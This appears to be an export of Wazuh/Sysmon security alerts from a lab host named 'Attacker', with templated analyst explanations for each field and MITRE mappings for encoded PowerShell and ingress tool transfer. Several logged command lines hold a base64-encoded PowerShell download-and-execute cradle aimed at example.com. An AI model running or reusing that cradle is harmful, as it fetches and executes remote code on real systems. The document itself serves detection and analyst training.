data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:56.644 ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} ProcessId: 12340 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1 CreationUtcTime: 2025-04-24 22:39:56.644 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:56.644
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbb-680a-b90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:56.644
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:01.598+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:01.598+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  98
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534401.1946504
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:58.8999675Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285635
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:57.681 ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} ProcessId: 10672 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} ParentProcessId: 12340 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:57.681
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbd-680a-bb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdbb-680a-b90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:01.625+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:01.625+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  102
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534401.1954575
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:59.2948251Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285636
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:59.125 ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} ProcessId: 10672 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1 CreationUtcTime: 2025-04-24 22:39:59.125 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:59.125
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbd-680a-bb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:59.125
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:04.384+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:04.384+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  99
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534404.1957344
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:02.0874693Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285678
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:00.599 ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} ProcessId: 16112 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} ParentProcessId: 10672 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:00.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc0-680a-bd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16112
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdbd-680a-bb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:05.200+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:05.200+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  103
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534405.1965415
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:02.5743551Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285679
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

